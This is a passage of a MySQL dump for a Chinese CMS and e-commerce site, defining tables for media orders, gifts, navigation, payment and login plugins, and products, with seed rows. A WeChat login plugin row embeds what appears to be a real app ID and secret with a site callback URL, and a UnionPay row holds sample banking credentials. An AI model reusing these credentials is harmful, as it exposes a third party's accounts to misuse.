`order_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '媒体订单ID',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '媒体订单编号',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`mobile` varchar(20) DEFAULT '' COMMENT '手机',
`order_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '订单状态:0未付款,1已付款',
`order_amount` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '订单应付总金额',
`pay_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '支付时间',
`pay_name` varchar(20) NOT NULL DEFAULT '' COMMENT '支付方式名称',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`pay_details` text COMMENT '支付时返回的数据,以serialize序列化后存入,用于后续查询。',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '视频文档ID',
`product_name` varchar(100) DEFAULT '' COMMENT '视频文档名称',
`product_litpic` varchar(500) DEFAULT '' COMMENT '视频文档封面图片',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`order_id`),
UNIQUE KEY `order_code` (`order_code`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='视频订单表';
-- -----------------------------
-- Table structure for `ey_media_play_record`
-- -----------------------------
DROP TABLE IF EXISTS `ey_media_play_record`;
CREATE TABLE `ey_media_play_record` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT '0' COMMENT '用户id',
`aid` int(10) DEFAULT '0' COMMENT '课程id',
`file_id` int(10) DEFAULT '0' COMMENT '文件id',
`play_time` int(10) DEFAULT '0' COMMENT '播放时间',
`add_time` int(10) DEFAULT '0' COMMENT '添加时间',
`update_time` int(10) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='视频播放时长表';
-- -----------------------------
-- Table structure for `ey_memgift`
-- -----------------------------
DROP TABLE IF EXISTS `ey_memgift`;
CREATE TABLE `ey_memgift` (
`gift_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '礼品列表',
`type` tinyint(3) NOT NULL DEFAULT '1' COMMENT '-1-实物,2-会员产品',
`type_id` int(10) DEFAULT '0' COMMENT '类型为会员产品时的会员产品类型(users_type_manage)type_id',
`score` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '所需积分',
`litpic` varchar(250) NOT NULL DEFAULT '',
`giftname` varchar(60) NOT NULL DEFAULT '',
`num` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '兑换次数',
`content` longtext COMMENT '礼品详情',
`stock` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '库存总数',
`is_del` tinyint(3) NOT NULL DEFAULT '0' COMMENT '0-正常,1-删除',
`status` tinyint(2) NOT NULL DEFAULT '1' COMMENT '礼品状态:1=显示,0=隐藏',
`add_time` int(10) DEFAULT '0',
`update_time` int(10) DEFAULT '0',
`sort_order` int(10) DEFAULT '100' COMMENT '排序',
PRIMARY KEY (`gift_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_memgiftget`
-- -----------------------------
DROP TABLE IF EXISTS `ey_memgiftget`;
CREATE TABLE `ey_memgiftget` (
`gid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`giftname` char(60) NOT NULL DEFAULT '',
`gift_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '礼品ID',
`score` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '积分',
`users_id` mediumint(8) unsigned NOT NULL DEFAULT '0',
`status` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '状态,0-待发货,1-已发货,2-退回,3-重发',
`name` varchar(255) NOT NULL DEFAULT '' COMMENT '姓名',
`mobile` varchar(55) NOT NULL DEFAULT '' COMMENT '手机',
`address` varchar(255) NOT NULL DEFAULT '' COMMENT '地址',
`add_time` int(10) DEFAULT '0',
`update_time` int(10) DEFAULT '0',
`type_id` int(11) DEFAULT '0' COMMENT '兑换会员产品时,会员产品套餐(表::users_type_manage)type_id',
PRIMARY KEY (`gid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_nav_list`
-- -----------------------------
DROP TABLE IF EXISTS `ey_nav_list`;
CREATE TABLE `ey_nav_list` (
`nav_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '导航ID',
`nav_name` varchar(200) NOT NULL DEFAULT '' COMMENT '导航名称',
`parent_id` int(10) NOT NULL DEFAULT '0' COMMENT '上级菜单id',
`topid` int(10) NOT NULL DEFAULT '0' COMMENT '顶级菜单id',
`en_name` varchar(200) NOT NULL DEFAULT '' COMMENT '英文名称',
`nav_url` varchar(200) NOT NULL DEFAULT '' COMMENT '导航链接',
`position_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '导航位置',
`arctype_sync` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否与栏目同步',
`type_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '同步栏目的ID',
`nav_pic` varchar(255) NOT NULL DEFAULT '' COMMENT '导航图片',
`is_remote` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否远程图片',
`target` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否打开新窗口,1=是,0=否',
`nofollow` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否使用nofollow,1=是,0=否',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '启用 (1=正常,0=停用)',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`sort_order` int(10) unsigned NOT NULL DEFAULT '100' COMMENT '排序号',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`nav_id`) USING BTREE,
KEY `position_id` (`position_id`) USING BTREE,
KEY `type_id` (`type_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='导航列表';
-- -----------------------------
-- Table structure for `ey_nav_position`
-- -----------------------------
DROP TABLE IF EXISTS `ey_nav_position`;
CREATE TABLE `ey_nav_position` (
`position_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '导航列表ID',
`position_name` varchar(200) DEFAULT '' COMMENT '导航列表名称',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`position_id`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='导航位置表';
-- -----------------------------
-- Records of `ey_nav_position`
-- -----------------------------
INSERT INTO `ey_nav_position` VALUES ('1', 'PC端主导航', '100', '0', '0', '1624861478');
INSERT INTO `ey_nav_position` VALUES ('2', 'PC端顶部导航', '100', '0', '0', '1624861478');
INSERT INTO `ey_nav_position` VALUES ('3', 'PC端中部导航', '100', '0', '0', '1624861478');
INSERT INTO `ey_nav_position` VALUES ('4', 'PC端底部导航', '100', '0', '0', '1624861478');
INSERT INTO `ey_nav_position` VALUES ('5', '移动端中部导航', '100', '0', '0', '1624861478');
INSERT INTO `ey_nav_position` VALUES ('6', '移动端底部导航', '100', '0', '0', '1624861478');
-- -----------------------------
-- Table structure for `ey_nzsm_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_nzsm_content`;
CREATE TABLE `ey_nzsm_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`zdy` varchar(200) NOT NULL DEFAULT '' COMMENT '字段一',
`zde` varchar(200) NOT NULL DEFAULT '' COMMENT '字段二',
`zdsa` varchar(200) NOT NULL DEFAULT '' COMMENT '字段三',
`zdsi` varchar(200) NOT NULL DEFAULT '' COMMENT '字段四',
`zdw` varchar(200) NOT NULL DEFAULT '' COMMENT '字段五',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_nzsm_content`
-- -----------------------------
INSERT INTO `ey_nzsm_content` VALUES ('1', '8', '1589159107', '1589159107', '短信接口', '企业邮局', '云服务器', '主机租用', '域名注册');
INSERT INTO `ey_nzsm_content` VALUES ('2', '9', '1589159121', '1589159121', '', '手机商城', '小程序商城', '微商城', 'B2C商城');
INSERT INTO `ey_nzsm_content` VALUES ('3', '10', '1589159131', '1589159131', '', 'APP开发', '微信公众平台开发', '手机网站', '小程序开发');
INSERT INTO `ey_nzsm_content` VALUES ('4', '11', '1589159145', '1589159145', 'B2C商城网站建设', '新闻门户网站建设', '营销网站建设', '品牌网站建设', '企业网站建设');
-- -----------------------------
-- Table structure for `ey_pay_api_config`
-- -----------------------------
DROP TABLE IF EXISTS `ey_pay_api_config`;
CREATE TABLE `ey_pay_api_config` (
`pay_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '支付接口配置ID,自增',
`pay_name` varchar(64) NOT NULL DEFAULT '' COMMENT '支付接口配置名称,微信支付,支付宝支付...',
`pay_mark` varchar(64) NOT NULL DEFAULT '' COMMENT '支付接口配置标识,wechat,alipay...',
`pay_info` text NOT NULL COMMENT '支付接口配置信息,数组以序列化存储',
`pay_terminal` varchar(100) NOT NULL DEFAULT '' COMMENT '支付时的终端,暂时预留',
`system_built` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否属于系统内置,0否,1是',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态(0=关闭,1=开启)',
`lang` varchar(30) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`pay_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='支付接口配置表';
-- -----------------------------
-- Records of `ey_pay_api_config`
-- -----------------------------
INSERT INTO `ey_pay_api_config` VALUES ('1', '微信支付', 'wechat', '', 'a:3:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";}', '1', '1', 'cn', '1590111253', '1590661409');
INSERT INTO `ey_pay_api_config` VALUES ('2', '支付宝支付', 'alipay', '', 'a:4:{s:8:\"computer\";i:0;s:6:\"c_mark\";i:0;s:6:\"mobile\";i:0;s:6:\"m_mark\";i:0;}', '1', '1', 'cn', '1590111253', '1668569109');
-- -----------------------------
-- Table structure for `ey_pick_up_points`
-- -----------------------------
DROP TABLE IF EXISTS `ey_pick_up_points`;
CREATE TABLE `ey_pick_up_points` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '提货点',
`title` varchar(155) DEFAULT '' COMMENT '名称',
`intro` varchar(255) DEFAULT '' COMMENT '简介',
`phone` varchar(55) DEFAULT '' COMMENT '手机号',
`province` mediumint(8) DEFAULT '0',
`city` mediumint(8) DEFAULT '0',
`area` mediumint(8) DEFAULT '0',
`address` varchar(255) DEFAULT '' COMMENT '详细地址',
`bussiness_time` varchar(150) DEFAULT '' COMMENT '营业时间',
`logo` varchar(255) DEFAULT '' COMMENT 'logo',
`litpic` varchar(255) DEFAULT '' COMMENT '大',
`lng` varchar(100) DEFAULT '' COMMENT '经度',
`lat` varchar(100) DEFAULT '' COMMENT '纬度',
`add_time` int(10) DEFAULT '0',
`update_time` int(10) DEFAULT '0',
`status` tinyint(1) DEFAULT '0' COMMENT '状态 0-显示 1-不显示',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='核销提货点表';
-- -----------------------------
-- Table structure for `ey_plugin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_plugin`;
CREATE TABLE `ey_plugin` (
`code` varchar(13) DEFAULT NULL COMMENT '插件编码',
`name` varchar(55) DEFAULT NULL COMMENT '中文名字',
`version` varchar(255) DEFAULT NULL COMMENT '插件的版本',
`author` varchar(30) DEFAULT NULL COMMENT '插件作者',
`config` text COMMENT '配置信息',
`config_value` text COMMENT '配置值信息',
`desc` varchar(255) DEFAULT NULL COMMENT '插件描述',
`status` tinyint(1) DEFAULT '0' COMMENT '是否启用',
`type` varchar(50) DEFAULT NULL COMMENT '插件类型 payment支付 login 登陆 shipping物流',
`icon` varchar(255) DEFAULT NULL COMMENT '图标',
`bank_code` text COMMENT '网银配置信息',
`scene` tinyint(1) DEFAULT '0' COMMENT '使用场景 0PC+手机 1手机 2PC 3APP 4小程序',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_plugin`
-- -----------------------------
INSERT INTO `ey_plugin` VALUES ('alipayMobile', '手机网站支付宝', '1.0', '宇宙人', 'a:6:{i:0;a:4:{s:4:\"name\";s:14:\"alipay_account\";s:5:\"label\";s:15:\"支付宝帐户\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:10:\"alipay_key\";s:5:\"label\";s:21:\"交易安全校验码\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:14:\"alipay_partner\";s:5:\"label\";s:17:\"合作者身份ID\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:3;a:4:{s:4:\"name\";s:18:\"alipay_private_key\";s:5:\"label\";s:6:\"秘钥\";s:4:\"type\";s:8:\"textarea\";s:5:\"value\";s:0:\"\";}i:4;a:4:{s:4:\"name\";s:17:\"alipay_pay_method\";s:5:\"label\";s:19:\" 选择接口类型\";s:4:\"type\";s:6:\"select\";s:6:\"option\";a:2:{i:0;s:24:\"使用担保交易接口\";i:1;s:30:\"使用即时到帐交易接口\";}}i:5;a:4:{s:4:\"name\";s:7:\"is_bank\";s:5:\"label\";s:18:\"是否开通网银\";s:4:\"type\";s:6:\"select\";s:6:\"option\";a:2:{i:0;s:3:\"否\";i:1;s:3:\"是\";}}}', '', '手机端网站支付宝 ', '0', 'payment', 'logo.jpg', 'N;', '1', '0');
INSERT INTO `ey_plugin` VALUES ('cod', '到货付款', '1.0', 'IT宇宙人', 'a:1:{i:0;a:4:{s:4:\"name\";s:9:\"code_desc\";s:5:\"label\";s:12:\"配送描述\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', '货到付款插件 ', '0', 'payment', 'logo.jpg', 'N;', '0', '0');
INSERT INTO `ey_plugin` VALUES ('miniAppPay', '微信小程序支付', '1.0', 'lhb', 'a:4:{i:0;a:5:{s:4:\"name\";s:5:\"appid\";s:5:\"label\";s:20:\"绑定支付的APPID\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:4:\"hint\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:5:\"mchid\";s:5:\"label\";s:9:\"商户号\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:3:\"key\";s:5:\"label\";s:18:\"商户支付密钥\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:3;a:4:{s:4:\"name\";s:9:\"appsecret\";s:5:\"label\";s:15:\"小程序secret\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', '微信小程序支付信息', '0', 'payment', 'logo.jpg', 'N;', '4', '0');
INSERT INTO `ey_plugin` VALUES ('appWeixinPay', 'App微信支付', '1.0', 'wangqh', 'a:3:{i:0;a:5:{s:4:\"name\";s:5:\"appid\";s:5:\"label\";s:20:\"绑定支付的APPID\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:4:\"hint\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:5:\"mchid\";s:5:\"label\";s:9:\"商户号\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:3:\"key\";s:5:\"label\";s:18:\"商户支付密钥\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', '微信开放平台支付信息', '0', 'payment', 'logo.jpg', 'N;', '3', '0');
INSERT INTO `ey_plugin` VALUES ('tenpay', 'PC端财付通', '1.0', 'IT宇宙人', 'a:2:{i:0;a:4:{s:4:\"name\";s:7:\"partner\";s:5:\"label\";s:7:\"partner\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:3:\"key\";s:5:\"label\";s:3:\"key\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', 'PC端财付通插件 ', '0', 'payment', 'logo.jpg', 'N;', '2', '0');
INSERT INTO `ey_plugin` VALUES ('alipay', 'PC端支付宝', '1.0', 'jy_pwn', 'a:6:{i:0;a:4:{s:4:\"name\";s:14:\"alipay_account\";s:5:\"label\";s:15:\"支付宝帐户\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:10:\"alipay_key\";s:5:\"label\";s:21:\"交易安全校验码\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:14:\"alipay_partner\";s:5:\"label\";s:17:\"合作者身份ID\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:3;a:4:{s:4:\"name\";s:18:\"alipay_private_key\";s:5:\"label\";s:6:\"秘钥\";s:4:\"type\";s:8:\"textarea\";s:5:\"value\";s:0:\"\";}i:4;a:4:{s:4:\"name\";s:17:\"alipay_pay_method\";s:5:\"label\";s:19:\" 选择接口类型\";s:4:\"type\";s:6:\"select\";s:6:\"option\";a:2:{i:0;s:24:\"使用担保交易接口\";i:1;s:30:\"使用即时到帐交易接口\";}}i:5;a:4:{s:4:\"name\";s:7:\"is_bank\";s:5:\"label\";s:18:\"是否开通网银\";s:4:\"type\";s:6:\"select\";s:6:\"option\";a:2:{i:0;s:3:\"否\";i:1;s:3:\"是\";}}}', '', 'PC端支付宝插件 ', '0', 'payment', 'logo.jpg', 'a:8:{s:12:\"招商银行\";s:9:\"CMB-DEBIT\";s:18:\"中国工商银行\";s:10:\"ICBC-DEBIT\";s:12:\"交通银行\";s:10:\"COMM-DEBIT\";s:18:\"中国建设银行\";s:9:\"CCB-DEBIT\";s:18:\"中国民生银行\";s:4:\"CMBC\";s:12:\"中国银行\";s:9:\"BOC-DEBIT\";s:18:\"中国农业银行\";s:3:\"ABC\";s:12:\"上海银行\";s:6:\"SHBANK\";}', '2', '0');
INSERT INTO `ey_plugin` VALUES ('unionpay', '银联在线支付', '1.0', '奇闻科技', 'a:4:{i:0;a:4:{s:4:\"name\";s:12:\"unionpay_mid\";s:5:\"label\";s:9:\"商户号\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:15:\"777290058130619\";}i:1;a:4:{s:4:\"name\";s:21:\"unionpay_cer_password\";s:5:\"label\";s:25:\" 商户私钥证书密码\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:6:\"000000\";}i:2;a:4:{s:4:\"name\";s:13:\"unionpay_user\";s:5:\"label\";s:19:\" 企业网银账号\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:12:\"123456789001\";}i:3;a:4:{s:4:\"name\";s:17:\"unionpay_password\";s:5:\"label\";s:19:\" 企业网银密码\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:6:\"789001\";}}', '', '银联在线支付插件 ', '0', 'payment', 'logo.jpg', 'N;', '0', '0');
INSERT INTO `ey_plugin` VALUES ('weixin', '微信支付', '1.0', 'IT宇宙人', 'a:5:{i:0;a:4:{s:4:\"name\";s:5:\"appid\";s:5:\"label\";s:20:\"绑定支付的APPID\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:5:\"mchid\";s:5:\"label\";s:9:\"商户号\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:3:\"key\";s:5:\"label\";s:18:\"商户支付密钥\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:3;a:4:{s:4:\"name\";s:9:\"appsecret\";s:5:\"label\";s:57:\"公众帐号secert(仅JSAPI支付的时候需要配置)\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:4;a:4:{s:4:\"name\";s:6:\"smchid\";s:5:\"label\";s:48:\"服务商商户号,企业在线付款需用到\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', 'PC端+微信公众号支付', '0', 'payment', 'logo.jpg', 'N;', '0', '0');
INSERT INTO `ey_plugin` VALUES ('helloworld', 'HelloWorld插件', 'v2.0.5,v2.0.7', '惹妹子生气了', '', '', '适合v2.0.5 , v2.0.7', '0', 'function', 'logo.jpg', 'N;', '0', '0');
INSERT INTO `ey_plugin` VALUES ('weixin', '微信登录', '1.0', '彭老师', 'a:3:{i:0;a:4:{s:4:\"name\";s:5:\"appid\";s:5:\"label\";s:17:\"开放平台appid\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:6:\"secret\";s:5:\"label\";s:18:\"开放平台secret\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:10:\"return_url\";s:5:\"label\";s:9:\"回调URL\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', 'a:3:{s:5:\"appid\";s:18:\"wx0f0ff39efd386c42\";s:6:\"secret\";s:32:\"fc878c9641346adc9b7d7e299572ba42\";s:10:\"return_url\";s:67:\"http://www.lvxing1788.com/index/LoginApi/callback/oauth/weixin.html\";}', '微信扫码登录插件 ', '1', 'login', 'logo.jpg', 'N;', '0', '1513556648');
INSERT INTO `ey_plugin` VALUES ('qq', 'QQ登录', '1.0', '彭老师', 'a:3:{i:0;a:4:{s:4:\"name\";s:6:\"app_id\";s:5:\"label\";s:6:\"app_id\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:1;a:4:{s:4:\"name\";s:10:\"app_secret\";s:5:\"label\";s:10:\"app_secret\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}i:2;a:4:{s:4:\"name\";s:10:\"return_url\";s:5:\"label\";s:9:\"回调URL\";s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";}}', '', 'QQ登录插件 ', '1', 'login', 'logo.jpg', 'N;', '0', '0');
-- -----------------------------
-- Table structure for `ey_product_attr`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_attr`;
CREATE TABLE `ey_product_attr` (
`product_attr_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '产品属性id自增',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '产品id',
`attr_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '属性id',
`attr_value` text COMMENT '属性值',
`attr_price` varchar(255) DEFAULT '' COMMENT '属性价格',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`product_attr_id`),
KEY `aid` (`aid`) USING BTREE,
KEY `attr_id` (`attr_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_product_attribute`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_attribute`;
CREATE TABLE `ey_product_attribute` (
`attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '属性id',
`attr_name` varchar(60) DEFAULT '' COMMENT '属性名称',
`typeid` int(11) unsigned DEFAULT '0' COMMENT '栏目id',
`attr_index` tinyint(1) unsigned DEFAULT '0' COMMENT '0不需要检索 1关键字检索 2范围检索',
`attr_input_type` tinyint(1) unsigned DEFAULT '0' COMMENT ' 0=文本框,1=下拉框,2=多行文本框',
`attr_values` text COMMENT '可选值列表',
`sort_order` int(11) unsigned DEFAULT '0' COMMENT '属性排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`is_del` tinyint(1) DEFAULT '0' COMMENT '是否已删除,0=否,1=是',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`attr_id`),
KEY `cat_id` (`typeid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_product_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_content`;
CREATE TABLE `ey_product_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `news_id` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='资讯内容表_存储正常内容';
-- -----------------------------
-- Table structure for `ey_product_custom_param`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_custom_param`;
CREATE TABLE `ey_product_custom_param` (
`param_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '参数ID',
`aid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '参数ID',
`param_name` varchar(60) NOT NULL DEFAULT '' COMMENT '参数名称',
`param_value` varchar(200) NOT NULL DEFAULT '' COMMENT '参数值',
`sort_order` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '属性排序',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`param_id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_product_img`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_img`;
CREATE TABLE `ey_product_img` (
`img_id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '产品ID',
`title` varchar(200) DEFAULT '' COMMENT '产品标题',
`image_url` varchar(255) DEFAULT '' COMMENT '文件存储路径',
`intro` varchar(2000) DEFAULT '' COMMENT '图集描述',
`width` int(11) DEFAULT '0' COMMENT '图片宽度',
`height` int(11) DEFAULT '0' COMMENT '图片高度',
`filesize` varchar(255) DEFAULT '' COMMENT '文件大小',
`mime` varchar(50) DEFAULT '' COMMENT '图片类型',
`sort_order` smallint(5) DEFAULT '0' COMMENT '排序',
`add_time` int(10) unsigned DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`img_id`),
KEY `arcid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_product_netdisk`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_netdisk`;
CREATE TABLE `ey_product_netdisk` (
`nd_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '网盘商品id',
`aid` int(10) DEFAULT '0' COMMENT '产品ID',
`netdisk_url` varchar(255) NOT NULL DEFAULT '' COMMENT '网盘地址',
`netdisk_pwd` varchar(50) NOT NULL DEFAULT '' COMMENT '提取码',
`unzip_pwd` varchar(50) NOT NULL DEFAULT '' COMMENT '解压密码',
`text_content` text NOT NULL COMMENT '文本内容',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`nd_id`) USING BTREE,
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='产品虚拟表';
-- -----------------------------
-- Table structure for `ey_product_spec_data`
-- -----------------------------
DROP TABLE IF EXISTS `ey_product_spec_data`;
CREATE TABLE `ey_product_spec_data` (
`spec_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` int(10) DEFAULT '0' COMMENT '产品ID',
`spec_mark_id` int(10) DEFAULT '0' COMMENT '规格标记ID',
`spec_name` varchar(100) DEFAULT '' COMMENT '规格名称',
`spec_value_id` int(10) DEFAULT '0' COMMENT '规格值ID',
`spec_value` varchar(100) DEFAULT '' COMMENT '规格值',
`spec_is_select` tinyint(1) DEFAULT '0' COMMENT '是否选中(0=否,1=是)',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`spec_id`)
